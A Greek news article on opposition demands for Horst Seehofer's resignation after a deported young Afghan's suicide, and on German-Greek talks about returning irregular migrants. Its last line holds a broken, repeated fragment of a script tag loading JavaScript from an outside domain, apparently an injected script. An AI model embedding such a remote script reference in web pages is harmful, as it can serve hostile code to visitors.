Γερμανία: Παραίτηση Ζεεχόφερ ζητά η αντιπολίτευση μετά την αυτοκτονία νεαρού μετανάστη – Συζήτησαν Γερμανοί και Έλληνες αξιωματούχοι για επιστροφές παράτυπων μεταναστών

Στελέχη κομμάτων της αντιπολίτευσης στη Γερμανία ζήτησαν από τον υπουργό Εσωτερικών, Χορστ Ζεεχόφερ να παραιτηθεί, μετά την αυτοκτονία ενός νεαρού Αφγανού η αίτηση του οποίου να του χορηγηθεί άσυλο απορρίφθηκε και νωρίτερα αυτή την εβδομάδα απελάθηκε μαζί με άλλους 68 συμπατριώτες του στο Αφγανιστάν, όπου βρέθηκε απαγχονισμένος μέσα σε κέντρο φιλοξενίας του Διεθνούς Οργανισμού Μετανάστευσης.

«Είναι καιρός ο Ζεεχόφερ να αποχωρήσει», δήλωσε ο Γιαν Κόρτε του κόμματος Η Αριστερά (Die Linke).

Τα σχόλια αγαλλίασης που έκανε ο Ζεεχόφερ για την ομαδική απέλαση των Αφγανών αιτούντων άσυλο, επειδή συνέπεσε με τα 69 γενέθλιά του, πυροδότησαν έντονες αντιδράσεις.

«Ακριβώς 69 μεταφέρθηκαν πίσω στο Αφγανιστάν την ημέρα των 69ων γενεθλίων μου–και δεν έγινε κατ’ εντολή μου», είπε χαμογελώντας ο Ζεεχόφερ την Τρίτη.

Η Γκιούντε Γένσεν, στέλεχος των Ελεύθερων Δημοκρατών, δήλωσε στην εφημερίδα Tagesspiegel ότι κάποιος που εκστομίζει τόσο κυνικά σχόλια βρίσκεται «προφανώς στη λάθος θέση».

Ο Ζεεχόφερ εξέφρασε τη λύπη του για την αυτοκτονία του νεαρού Αφγανού την Τετάρτη, λέγοντας πως ήταν «βαθύτατα λυπηρή, και πρέπει να την αντιμετωπίσουμε με τρόπο που θα χαρακτηρίζεται από σεβασμό και θα στέκεται στα γεγονότα».

Ερωτηθείς από έναν δημοσιογράφο τι απαντά σε όσους λένε ότι πρέπει να παραιτηθεί, ο Ζεεχόφερ απάντησε: «Δεν έχω τίποτα να τους πω, διότι δεν τους καταλαβαίνω».

Εκπρόσωπος του υπουργείου Προσφύγων του Αφγανιστάν ανέφερε ότι ο νεαρός, που απελάθηκε από το Αμβούργο την 4η Ιουλίου, βρέθηκε απαγχονισμένος την Τρίτη.

Αξιωματούχος της υπηρεσίας μετανάστευσης της Γερμανίας είπε υπό τον όρο να μην κατονομαστεί ότι ο 23χρονος, που καταγόταν από τη βόρεια αφγανική επαρχία Μπαλχ, ζούσε στη Γερμανία οκτώ χρόνια πριν τον επαναπατρισμό του.

Ένας από τους ανθρώπους που απελάθηκαν μαζί του, ένας 19χρονος από την επαρχία Ουάρντακ, σημείωσε πως ο αυτόχειρας ήταν κλεισμένος στον εαυτό του. «Ήταν ένα ανθρώπινο ον, πρέπει να είχε όνειρα, και τίποτε δεν πήγε καλά», ανέφερε ο Μιρουάις Χασέμι.

Ο Ζεεχόφερ πρωτοστατεί στην προσπάθεια να τεθούν σε εφαρμογή πολύ σκληρότερες πολιτικές έναντι των μεταναστών και των προσφύγων στη Γερμανία και ευρύτερα στην Ευρωπαϊκή Ένωση κι έφερε την κυβέρνηση υπό την καγκελάριο Άνγκελα Μέρκελ στα πρόθυρα της κατάρρευσης απειλώντας να κλείσει τα γερμανικά σύνορα σε ορισμένες κατηγορίες μεταναστών και προσφύγων.

 

Στη φάση των σκληρών διαβουλεύσεων μπήκαν από χθες Έλληνες και Γερμανοί αξιωματούχοι για τον τρόπο και τη νομική βάση κάτω από την οποία θα γίνονται οι επιστροφές παράτυπων μεταναστών από την Γερμανία στην Ελλάδα. Το εντυπωσιακό και άκρως ανησυχητικό είναι ότι οι Γερμανοί διεκδικούν οι επιστροφές να μην γίνονται βάση της συνθήκης του Δουβλίνου!

Τι σημαίνει αυτό πρακτικά; Ότι η Ελλάδα δεν θα μπορεί να πιστοποιεί αν οι παράτυποι μετανάστες, που επιστρέφουν στην Ελλάδα από τη Γερμανία, πέρασαν πράγματι το τελευταίο διάστημα στη Γερμανία και δεν πρόκειται για παράτυπους αλλοδαπούς που βρίσκονται εδώ και καιρόστην ευρωπαϊκή χώρα, χωρίς χαρτιά.

Και ενώ οι Γερμανοί αξιωματούχοι έδειξαν με το «καλημέρα» τις προθέσεις τους, οι Έλληνες αξιωματούχοι ξεκαθαρίζουν ότι όχι μόνο θα επιμείνουν στο να γίνονται οι επιστροφές με βάση τη συνθήκη του Δουβλίνου αλλά δεν αποκλείεται να ζητήσουν να βρίσκονται και Έλληνες αστυνομικοί στα σύνορα Γερμανίας – Αυστρίας όπου είναι το πέρασμα των παράτυπων αλλοδαπών, ώστε να πιστοποιούν και οι ίδιοι τους παράτυπους που επιχειρούν να μπουν στη Γερμανία.

Σε τέσσερις εβδομάδες θα πρέπει να έχουν ληφθεί όλες οι αποφάσεις και να έχουν ρυθμιστεί όλες οι λεπτομέρειες, καθώς από 1 Αυγούστου οι αλλοδαποί που μπαίνουν παράνομα στη Γερμανία, θα μπορούν να επιστραφούν στην Ελλάδα.

Οι Γερμανοί αξιωματούχοι, πάντως, θα στείλουν μέχρι το τέλος της άλλης εβδομάδας τρεις διαφορετικές προτάσεις πάνω στις οποίες θα πρέπει να τοποθετηθούν οι ελληνικές Αρχές.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>